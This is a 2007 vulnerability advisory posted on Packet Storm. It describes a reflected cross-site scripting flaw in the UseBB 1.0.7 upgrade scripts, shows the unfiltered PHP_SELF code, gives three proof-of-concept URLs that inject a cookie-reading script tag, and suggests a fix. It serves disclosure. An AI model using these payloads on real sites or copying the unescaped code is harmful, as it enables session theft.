exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

usebb-xss.txt

usebb-xss.txt
Posted Jul 23, 2007
Authored by S4mi

UseBB version 1.0.7 suffers from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | dbaf1c0d8b52049db5b6d7a9f5abb0dad3175710b729683d2781a076d9494251

usebb-xss.txt

Change Mirror Download
#############################################################
# Script...............: UseBB version: 1.0.7 #
# Script Site..........: http://www.usebb.net #
# Vulnerability........: Cross Site Scripting (XSS) #
# Acces................: Remote #
# level................: Dangerous #
# Author...............: S4mi #
# Contact..............: s4mi[at]LinuxMail.org #
#############################################################

The affected Files :
====================
/UseBB/install/upgrade-0-2-3.php
/UseBB/install/upgrade-0-3.php
/UseBB/install/upgrade-0-4.php

vuln Code: line ~ 86
=====================
[code]
return '<form action="'.$_SERVER['PHP_SELF'].'" method="post"><p><input type="hidden"
name="step" value="'.$step.'" /><input type="submit" value="' . ( ( $_POST['step'] == $step ) ? 'Retry step
'.$step : 'Continue to step '.$step ) . '" /></p></form>';
[/code]

The variables PHP_SELF is used without filtering

PoC :
====================
http://127.0.0.1/UseBB/install/upgrade-0-2-3.php/"><ScRiPt>alert(document.cookie);</ScRiPt>
http://127.0.0.1/UseBB/install/upgrade-0-3.php/"><ScRiPt>alert(document.cookie);</ScRiPt>
http://127.0.0.1/UseBB/install/upgrade-0-4.php/"><ScRiPt>alert(document.cookie);</ScRiPt>

Solution :
====================

filtre the PHP_SELF
or you know what's the best lool : Delete the Install directory :D

Shoutz :
====================
Simo64, DrackaNz, Iss4m, Coder212, HarDose, r0_0t, ddx39, E.chark, Nuck3r ....... & all Others
Login or Register to add favorites

File Archive:

February 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    11 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    5 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    0 Files
  • 6
    Feb 6th
    0 Files
  • 7
    Feb 7th
    0 Files
  • 8
    Feb 8th
    0 Files
  • 9
    Feb 9th
    0 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    0 Files
  • 13
    Feb 13th
    0 Files
  • 14
    Feb 14th
    0 Files
  • 15
    Feb 15th
    0 Files
  • 16
    Feb 16th
    0 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close